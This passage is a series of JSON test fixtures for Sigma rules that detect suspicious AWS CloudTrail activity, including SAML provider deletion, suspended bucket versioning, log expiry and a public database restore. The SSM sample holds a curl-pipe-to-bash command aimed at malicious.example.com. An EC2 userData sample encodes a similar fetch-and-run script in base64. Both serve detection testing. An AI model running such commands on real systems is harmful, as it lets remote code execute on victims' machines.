"Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "elasticloadbalancing.amazonaws.com", 27 | "eventName": "ApplySecurityGroupsToLoadBalancer", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": null, 32 | "responseElements": null, 33 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 34 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 35 | "readOnly": true, 36 | "eventType": "AwsApiCall", 37 | "managementEvent": true, 38 | "recipientAccountId": "123456789012", 39 | "eventCategory": "Management" 40 | } 41 | ], 42 | "should_not_match": [ 43 | { 44 | "eventVersion": "1.09", 45 | "userIdentity": { 46 | "type": "AssumedRole", 47 | "principalId": "AROEXAMPLE", 48 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 49 | "accountId": "123456789012", 50 | "accessKeyId": "ASIAXXXXXX", 51 | "sessionContext": { 52 | "sessionIssuer": { 53 | "type": "Role", 54 | "principalId": "AROEXAMPLE", 55 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 56 | "accountId": "123456789012", 57 | "userName": "ExampleUserName" 58 | }, 59 | "attributes": { 60 | "creationDate": "2025-03-09T16:39:29Z", 61 | "mfaAuthenticated": "false" 62 | } 63 | } 64 | }, 65 | "eventTime": "2025-03-09T16:39:48Z", 66 | "eventSource": "cloudtrail.amazonaws.com", 67 | "eventName": "ApplySecurityGroupsToLoadBalancer", 68 | "awsRegion": "us-east-1", 69 | "sourceIPAddress": "1.2.3.4", 70 | "userAgent": "ExampleAgent/1.0", 71 | "requestParameters": null, 72 | "responseElements": null, 73 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 74 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 75 | "readOnly": true, 76 | 
"eventType": "AwsApiCall", 77 | "managementEvent": true, 78 | "recipientAccountId": "123456789012", 79 | "eventCategory": "Management" 80 | } 81 | ] 82 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_delete_saml_provider_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-04-12T16:15:48Z", 26 | "eventSource": "iam.amazonaws.com", 27 | "eventName": "DeleteSAMLProvider", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "192.0.2.1", 30 | "userAgent": "aws-cli/2.9.19", 31 | "requestParameters": { 32 | "samlProviderArn": "arn:aws:iam::123456789012:saml-provider/MyOktaSAMLProvider" 33 | }, 34 | "responseElements": null, 35 | "requestID": "abcd1234-ef56-7890-abcd-ef1234567890", 36 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 37 | "readOnly": true, 38 | "eventType": "AwsApiCall", 39 | "managementEvent": true, 40 | "recipientAccountId": "123456789012", 41 | "eventCategory": "Management" 42 | } 43 | ], 44 | "should_not_match": [ 45 | { 46 | "eventVersion": "1.09", 47 | "userIdentity": { 48 | "type": "AssumedRole", 49 | "principalId": "AROEXAMPLE", 50 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 51 | "accountId": "123456789012", 52 | "accessKeyId": "ASIAXXXXXX", 53 | 
"sessionContext": { 54 | "sessionIssuer": { 55 | "type": "Role", 56 | "principalId": "AROEXAMPLE", 57 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 58 | "accountId": "123456789012", 59 | "userName": "ExampleUserName" 60 | }, 61 | "attributes": { 62 | "creationDate": "2025-03-09T16:39:29Z", 63 | "mfaAuthenticated": "false" 64 | } 65 | } 66 | }, 67 | "eventTime": "2025-03-09T16:39:48Z", 68 | "eventSource": "iam.amazonaws.com", 69 | "eventName": "CreateSAMLProvider", 70 | "awsRegion": "us-east-1", 71 | "sourceIPAddress": "1.2.3.4", 72 | "userAgent": "ExampleAgent/1.0", 73 | "requestParameters": null, 74 | "responseElements": null, 75 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 76 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 77 | "readOnly": true, 78 | "eventType": "AwsApiCall", 79 | "managementEvent": true, 80 | "recipientAccountId": "123456789012", 81 | "eventCategory": "Management" 82 | } 83 | ] 84 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_disable_bucket_versioning_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-04-12T16:35:48Z", 26 | "eventSource": "s3.amazonaws.com", 27 | "eventName": "PutBucketVersioning", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "192.0.2.1", 30 | 
"userAgent": "aws-cli/2.9.19", 31 | "requestParameters": { 32 | "bucketName": "sensitive-data-bucket", 33 | "versioning": { 34 | "status": "Suspended" 35 | } 36 | }, 37 | "responseElements": null, 38 | "requestID": "abcd1234-ef56-7890-abcd-ef1234567890", 39 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 40 | "readOnly": true, 41 | "eventType": "AwsApiCall", 42 | "managementEvent": true, 43 | "recipientAccountId": "123456789012", 44 | "eventCategory": "Management" 45 | } 46 | ], 47 | "should_not_match": [ 48 | { 49 | "eventVersion": "1.09", 50 | "userIdentity": { 51 | "type": "AssumedRole", 52 | "principalId": "AROEXAMPLE", 53 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 54 | "accountId": "123456789012", 55 | "accessKeyId": "ASIAXXXXXX", 56 | "sessionContext": { 57 | "sessionIssuer": { 58 | "type": "Role", 59 | "principalId": "AROEXAMPLE", 60 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 61 | "accountId": "123456789012", 62 | "userName": "ExampleUserName" 63 | }, 64 | "attributes": { 65 | "creationDate": "2025-03-09T16:39:29Z", 66 | "mfaAuthenticated": "false" 67 | } 68 | } 69 | }, 70 | "eventTime": "2025-04-12T16:39:32Z", 71 | "eventSource": "s3.amazonaws.com", 72 | "eventName": "PutBucketVersioning", 73 | "awsRegion": "us-east-1", 74 | "sourceIPAddress": "192.0.2.1", 75 | "userAgent": "aws-cli/2.9.19", 76 | "requestParameters": { 77 | "bucketName": "sensitive-data-bucket", 78 | "versioning": { 79 | "status": "Enabled" 80 | } 81 | }, 82 | "responseElements": null, 83 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 84 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 85 | "readOnly": true, 86 | "eventType": "AwsApiCall", 87 | "managementEvent": true, 88 | "recipientAccountId": "123456789012", 89 | "eventCategory": "Management" 90 | } 91 | ] 92 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_console_getsignintoken_tests.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-04-12T14:39:48Z", 26 | "eventSource": "signin.amazonaws.com", 27 | "eventName": "GetSigninToken", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "192.0.2.1", 30 | "userAgent": "test/2.25.1", 31 | "requestParameters": { 32 | "sessionType": "json", 33 | "sessionId": "ASIAXXXXXXXXXXX", 34 | "sessionKey": "SECRET_KEY", 35 | "sessionToken": "SESSION_TOKEN" 36 | }, 37 | "responseElements": null, 38 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 39 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 40 | "readOnly": true, 41 | "eventType": "AwsApiCall", 42 | "managementEvent": true, 43 | "recipientAccountId": "123456789012", 44 | "eventCategory": "Management" 45 | } 46 | ], 47 | "should_not_match": [ 48 | { 49 | "eventVersion": "1.09", 50 | "userIdentity": { 51 | "type": "AssumedRole", 52 | "principalId": "AROEXAMPLE", 53 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 54 | "accountId": "123456789012", 55 | "accessKeyId": "ASIAXXXXXX", 56 | "sessionContext": { 57 | "sessionIssuer": { 58 | "type": "Role", 59 | "principalId": "AROEXAMPLE", 60 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 61 | "accountId": "123456789012", 62 | "userName": "ExampleUserName" 63 | }, 64 | "attributes": { 65 | 
"creationDate": "2025-03-09T16:39:29Z", 66 | "mfaAuthenticated": "false" 67 | } 68 | } 69 | }, 70 | "eventTime": "2025-04-12T14:45:12Z", 71 | "eventSource": "signin.amazonaws.com", 72 | "eventName": "GetSigninToken", 73 | "awsRegion": "us-east-1", 74 | "sourceIPAddress": "192.0.2.1", 75 | "userAgent": "Jersey/2.25.1", 76 | "requestParameters": { 77 | "sessionType": "json", 78 | "sessionId": "ASIAXXXXXXXXXXX", 79 | "sessionKey": "SECRET_KEY", 80 | "sessionToken": "SESSION_TOKEN" 81 | }, 82 | "responseElements": null, 83 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 84 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 85 | "readOnly": true, 86 | "eventType": "AwsApiCall", 87 | "managementEvent": true, 88 | "recipientAccountId": "123456789012", 89 | "eventCategory": "Management" 90 | } 91 | ] 92 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_config_disable_recording_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "config.amazonaws.com", 27 | "eventName": "DeleteDeliveryChannel", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "deliveryChannelName": "default" 33 | }, 34 | 
"responseElements": { 35 | "ResponseMetadata": { 36 | "RequestId": "12345678-1234-1234-1234-123456789012", 37 | "HTTPStatusCode": 200, 38 | "HTTPHeaders": { 39 | "content-type": "application/x-amz-json-1.1", 40 | "date": "Sat, 09 Mar 2025 16:39:48 GMT" 41 | } 42 | } 43 | }, 44 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 45 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 46 | "readOnly": false, 47 | "eventType": "AwsApiCall", 48 | "managementEvent": true, 49 | "recipientAccountId": "123456789012", 50 | "eventCategory": "Management" 51 | } 52 | ], 53 | "should_not_match": [ 54 | { 55 | "eventVersion": "1.09", 56 | "userIdentity": { 57 | "type": "AssumedRole", 58 | "principalId": "AROEXAMPLE", 59 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 60 | "accountId": "123456789012", 61 | "accessKeyId": "ASIAXXXXXX", 62 | "sessionContext": { 63 | "sessionIssuer": { 64 | "type": "Role", 65 | "principalId": "AROEXAMPLE", 66 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 67 | "accountId": "123456789012", 68 | "userName": "ExampleUserName" 69 | }, 70 | "attributes": { 71 | "creationDate": "2025-03-09T16:39:29Z", 72 | "mfaAuthenticated": "false" 73 | } 74 | } 75 | }, 76 | "eventTime": "2025-03-09T16:39:48Z", 77 | "eventSource": "cloudtrail.amazonaws.com", 78 | "eventName": "DeleteDeliveryChannel", 79 | "awsRegion": "us-east-1", 80 | "sourceIPAddress": "1.2.3.4", 81 | "userAgent": "ExampleAgent/1.0", 82 | "requestParameters": null, 83 | "responseElements": null, 84 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 85 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 86 | "readOnly": true, 87 | "eventType": "AwsApiCall", 88 | "managementEvent": true, 89 | "recipientAccountId": "123456789012", 90 | "eventCategory": "Management" 91 | } 92 | ] 93 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_ec2_startup_script_change_tests.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ec2.amazonaws.com", 27 | "eventName": "ModifyInstanceAttribute", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "instanceId": "i-0abc123def456789", 33 | "attribute": "userData", 34 | "value": "IyEvYmluL2Jhc2gKZWNobyAiVGhpcyBpcyBhIG1vZGlmaWVkIHN0YXJ0dXAgc2NyaXB0IiA+IC90bXAvc3RhcnR1cF9jaGFuZ2VkLnR4dApjdXJsIC1zIGh0dHA6Ly9leGFtcGxlLmNvbS9wYXlsb2FkLnNoIHwgYmFzaA==" 35 | }, 36 | "responseElements": null, 37 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 38 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 39 | "readOnly": true, 40 | "eventType": "AwsApiCall", 41 | "managementEvent": true, 42 | "recipientAccountId": "123456789012", 43 | "eventCategory": "Management" 44 | } 45 | ], 46 | "should_not_match": [ 47 | { 48 | "eventVersion": "1.09", 49 | "userIdentity": { 50 | "type": "AssumedRole", 51 | "principalId": "AROEXAMPLE", 52 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 53 | "accountId": "123456789012", 54 | "accessKeyId": "ASIAXXXXXX", 55 | "sessionContext": { 56 | "sessionIssuer": { 57 | "type": "Role", 58 | "principalId": "AROEXAMPLE", 59 | "arn": 
"arn:aws:iam::123456789012:role/ExampleRole", 60 | "accountId": "123456789012", 61 | "userName": "ExampleUserName" 62 | }, 63 | "attributes": { 64 | "creationDate": "2025-03-09T16:39:29Z", 65 | "mfaAuthenticated": "false" 66 | } 67 | } 68 | }, 69 | "eventTime": "2025-03-09T16:39:48Z", 70 | "eventSource": "cloudtrail.amazonaws.com", 71 | "eventName": "ModifyInstanceAttribute", 72 | "awsRegion": "us-east-1", 73 | "sourceIPAddress": "1.2.3.4", 74 | "userAgent": "ExampleAgent/1.0", 75 | "requestParameters": { 76 | "instanceId": "i-0abc123def456789", 77 | "attribute": "instanceType", 78 | "value": "t3.medium" 79 | }, 80 | "responseElements": null, 81 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 82 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 83 | "readOnly": true, 84 | "eventType": "AwsApiCall", 85 | "managementEvent": true, 86 | "recipientAccountId": "123456789012", 87 | "eventCategory": "Management" 88 | } 89 | ] 90 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_rds_public_db_restore_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "rds.amazonaws.com", 27 | "eventName": "RestoreDBInstanceFromDBSnapshot", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": 
"1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "dBInstanceIdentifier": "restored-db-instance", 33 | "dBSnapshotIdentifier": "sensitive-db-snapshot", 34 | "dbInstanceClass": "db.m5.large" 35 | }, 36 | "responseElements": { 37 | "dBInstanceIdentifier": "restored-db-instance", 38 | "dBSnapshotIdentifier": "sensitive-db-snapshot", 39 | "publiclyAccessible": "true", 40 | "engine": "mysql", 41 | "masterUsername": "admin" 42 | }, 43 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 44 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 45 | "readOnly": true, 46 | "eventType": "AwsApiCall", 47 | "managementEvent": true, 48 | "recipientAccountId": "123456789012", 49 | "eventCategory": "Management" 50 | } 51 | ], 52 | "should_not_match": [ 53 | { 54 | "eventVersion": "1.09", 55 | "userIdentity": { 56 | "type": "AssumedRole", 57 | "principalId": "AROEXAMPLE", 58 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 59 | "accountId": "123456789012", 60 | "accessKeyId": "ASIAXXXXXX", 61 | "sessionContext": { 62 | "sessionIssuer": { 63 | "type": "Role", 64 | "principalId": "AROEXAMPLE", 65 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 66 | "accountId": "123456789012", 67 | "userName": "ExampleUserName" 68 | }, 69 | "attributes": { 70 | "creationDate": "2025-03-09T16:39:29Z", 71 | "mfaAuthenticated": "false" 72 | } 73 | } 74 | }, 75 | "eventTime": "2025-03-09T16:39:48Z", 76 | "eventSource": "cloudtrail.amazonaws.com", 77 | "eventName": "RestoreDBInstanceFromDBSnapshot", 78 | "awsRegion": "us-east-1", 79 | "sourceIPAddress": "1.2.3.4", 80 | "userAgent": "ExampleAgent/1.0", 81 | "requestParameters": null, 82 | "responseElements": null, 83 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 84 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 85 | "readOnly": true, 86 | "eventType": "AwsApiCall", 87 | "managementEvent": true, 88 | "recipientAccountId": "123456789012", 89 | "eventCategory": "Management" 90 | } 91 | ] 92 | } 
-------------------------------------------------------------------------------- /rules/sigma_rules/aws_s3_lifecycle_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "s3.amazonaws.com", 27 | "eventName": "PutBucketLifecycleConfiguration", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "bucketName": "aws-cloudtrail-logs-123456789012-a1b2c3d4", 33 | "lifecycleConfiguration": { 34 | "rules": [ 35 | { 36 | "status": "Enabled", 37 | "id": "ExpireCloudTrailLogs", 38 | "prefix": "AWSLogs/", 39 | "expiration": { 40 | "days": 1 41 | } 42 | } 43 | ] 44 | } 45 | }, 46 | "responseElements": null, 47 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 48 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 49 | "readOnly": true, 50 | "eventType": "AwsApiCall", 51 | "managementEvent": true, 52 | "recipientAccountId": "123456789012", 53 | "eventCategory": "Management" 54 | } 55 | ], 56 | "should_not_match": [ 57 | { 58 | "eventVersion": "1.09", 59 | "userIdentity": { 60 | "type": "AssumedRole", 61 | "principalId": "AROEXAMPLE", 62 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 63 | "accountId": "123456789012", 64 | "accessKeyId": 
"ASIAXXXXXX", 65 | "sessionContext": { 66 | "sessionIssuer": { 67 | "type": "Role", 68 | "principalId": "AROEXAMPLE", 69 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 70 | "accountId": "123456789012", 71 | "userName": "ExampleUserName" 72 | }, 73 | "attributes": { 74 | "creationDate": "2025-03-09T16:39:29Z", 75 | "mfaAuthenticated": "false" 76 | } 77 | } 78 | }, 79 | "eventTime": "2025-03-09T16:39:48Z", 80 | "eventSource": "cloudtrail.amazonaws.com", 81 | "eventName": "PutBucketLifecycleConfiguration", 82 | "awsRegion": "us-east-1", 83 | "sourceIPAddress": "1.2.3.4", 84 | "userAgent": "ExampleAgent/1.0", 85 | "requestParameters": null, 86 | "responseElements": null, 87 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 88 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 89 | "readOnly": true, 90 | "eventType": "AwsApiCall", 91 | "managementEvent": true, 92 | "recipientAccountId": "123456789012", 93 | "eventCategory": "Management" 94 | } 95 | ] 96 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_cloudtrail_ssm_malicious_usage_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-03-09T16:39:48Z", 26 | "eventSource": "ssm.amazonaws.com", 27 | "eventName": "SendCommand", 28 | "awsRegion": "us-east-1", 29 | 
"sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "documentName": "AWS-RunShellScript", 33 | "instanceIds": ["i-0abc123def456789"], 34 | "parameters": { 35 | "commands": ["curl -s http://malicious.example.com/payload.sh | bash"] 36 | } 37 | }, 38 | "responseElements": { 39 | "command": { 40 | "commandId": "01234567-0123-0123-0123-0123456789ab", 41 | "documentName": "AWS-RunShellScript", 42 | "status": "Success", 43 | "statusDetails": "Success" 44 | } 45 | }, 46 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 47 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 48 | "readOnly": true, 49 | "eventType": "AwsApiCall", 50 | "managementEvent": true, 51 | "recipientAccountId": "123456789012", 52 | "eventCategory": "Management" 53 | } 54 | ], 55 | "should_not_match": [ 56 | { 57 | "eventVersion": "1.09", 58 | "userIdentity": { 59 | "type": "AssumedRole", 60 | "principalId": "AROEXAMPLE", 61 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 62 | "accountId": "123456789012", 63 | "accessKeyId": "ASIAXXXXXX", 64 | "sessionContext": { 65 | "sessionIssuer": { 66 | "type": "Role", 67 | "principalId": "AROEXAMPLE", 68 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 69 | "accountId": "123456789012", 70 | "userName": "ExampleUserName" 71 | }, 72 | "attributes": { 73 | "creationDate": "2025-03-09T16:39:29Z", 74 | "mfaAuthenticated": "false" 75 | } 76 | } 77 | }, 78 | "eventTime": "2025-03-09T16:39:48Z", 79 | "eventSource": "cloudtrail.amazonaws.com", 80 | "eventName": "SendCommand", 81 | "awsRegion": "us-east-1", 82 | "sourceIPAddress": "1.2.3.4", 83 | "userAgent": "ExampleAgent/1.0", 84 | "requestParameters": null, 85 | "responseElements": null, 86 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 87 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 88 | "readOnly": true, 89 | "eventType": "AwsApiCall", 90 | "managementEvent": true, 91 | "recipientAccountId": "123456789012", 92 | "eventCategory": 
"Management" 93 | } 94 | ] 95 | } -------------------------------------------------------------------------------- /rules/sigma_rules/aws_rds_change_master_password_tests.json: -------------------------------------------------------------------------------- 1 | { 2 | "should_match": [ 3 | { 4 | "eventVersion": "1.09", 5 | "userIdentity": { 6 | "type": "AssumedRole", 7 | "principalId": "AROEXAMPLE", 8 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 9 | "accountId": "123456789012", 10 | "accessKeyId": "ASIAXXXXXX", 11 | "sessionContext": { 12 | "sessionIssuer": { 13 | "type": "Role", 14 | "principalId": "AROEXAMPLE", 15 | "arn": "arn:aws:iam::123456789012:role/ExampleRole", 16 | "accountId": "123456789012", 17 | "userName": "ExampleUserName" 18 | }, 19 | "attributes": { 20 | "creationDate": "2025-03-09T16:39:29Z", 21 | "mfaAuthenticated": "false" 22 | } 23 | } 24 | }, 25 | "eventTime": "2025-04-12T14:39:48Z", 26 | "eventSource": "rds.amazonaws.com", 27 | "eventName": "ModifyDBInstance", 28 | "awsRegion": "us-east-1", 29 | "sourceIPAddress": "1.2.3.4", 30 | "userAgent": "ExampleAgent/1.0", 31 | "requestParameters": { 32 | "dBInstanceIdentifier": "database-1", 33 | "masterUserPassword": "********" 34 | }, 35 | "responseElements": { 36 | "dBInstanceIdentifier": "database-1", 37 | "engine": "mysql", 38 | "pendingModifiedValues": { 39 | "masterUserPassword": "****" 40 | } 41 | }, 42 | "requestID": "4c23c774-e2b5-46fe-83b9-EXAMPLE", 43 | "eventID": "2a9c402c-5df4-4e68-a21f-EXAMPLE", 44 | "readOnly": true, 45 | "eventType": "AwsApiCall", 46 | "managementEvent": true, 47 | "recipientAccountId": "123456789012", 48 | "eventCategory": "Management" 49 | } 50 | ], 51 | "should_not_match": [ 52 | { 53 | "eventVersion": "1.09", 54 | "userIdentity": { 55 | "type": "AssumedRole", 56 | "principalId": "AROEXAMPLE", 57 | "arn": "arn:aws:sts::123456789012:assumed-role/ExampleRole/ExampleUser", 58 | "accountId": 